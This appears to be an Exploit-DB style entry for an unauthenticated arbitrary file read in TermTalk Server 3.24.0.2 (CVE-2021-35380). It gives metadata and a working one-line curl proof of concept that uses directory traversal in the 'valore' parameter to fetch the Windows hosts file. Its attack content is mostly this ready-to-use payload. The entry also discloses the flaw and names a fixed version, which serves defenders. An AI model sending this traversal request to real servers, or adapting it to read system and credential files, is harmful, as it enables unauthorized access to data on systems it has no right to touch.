TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
Author: Fabiano Golluscio
type: remote
platform: windows
port: nan
date_added: 2022-01-05
date_updated: 2022-03-07
verified: 0
codes: CVE-2021-35380
tags:
aliases:
screenshot_url:
application_url:
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/
POC
curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts